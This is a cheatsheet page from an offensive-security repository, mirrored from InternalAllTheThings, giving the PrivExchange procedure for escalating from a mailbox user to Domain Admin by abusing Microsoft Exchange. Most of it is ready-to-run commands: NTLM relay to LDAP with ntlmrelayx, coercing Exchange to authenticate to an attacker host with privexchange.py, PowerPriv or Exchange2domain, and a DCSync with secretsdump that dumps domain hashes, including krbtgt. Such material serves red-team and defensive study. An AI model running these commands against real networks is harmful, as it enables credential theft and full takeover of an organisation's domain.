daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

privexchange.md (3037B)


      1 ---
      2 title: "PrivExchange"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/CVE/PrivExchange.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/CVE/PrivExchange.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # PrivExchange
     12 
     13 Exchange your privileges for Domain Admin privs by abusing Exchange.
     14 :warning: You need a shell on a user account with a mailbox.
     15 
     16 1. Exchange server hostname or IP address
     17 
     18     ```bash
     19     pth-net rpc group members "Exchange Servers" -I dc01.domain.local -U domain/username
     20     ```
     21 
     22 2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
     23 
     24     ```powershell
     25     ntlmrelayx.py -t ldap://dc01.domain.local --escalate-user username
     26     ```
     27 
     28 3. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server. Forcing the Exchange server's to send back its NTLMv2 hash to a controlled machine.
     29 
     30     ```bash
     31     # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
     32     python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
     33     python privexchange.py -ah 10.0.0.2 mail01.domain.local -d domain.local -u user_exchange -p pass_exchange
     34     
     35     # https://github.com/G0ldenGunSec/PowerPriv 
     36     powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
     37     ```
     38 
     39 4. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
     40 
     41     ```bash
     42     python secretsdump.py xxxxxxxxxx -just-dc
     43     python secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
     44     ```
     45 
     46 5. Clean your mess and restore a previous state of the user's ACL
     47 
     48     ```powershell
     49     python aclpwn.py --restore ../aclpwn-20190319-125741.restore
     50     ```
     51 
     52 Alternatively you can use the Metasploit module
     53 
     54 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
     55 
     56 Alternatively you can use an all-in-one tool : Exchange2domain.
     57 
     58 ```powershell
     59 git clone github.com/Ridter/Exchange2domain 
     60 python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
     61 python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
     62 ```
     63 
     64 ## References
     65 
     66 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
     67 * [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/)
     68 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
     69 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)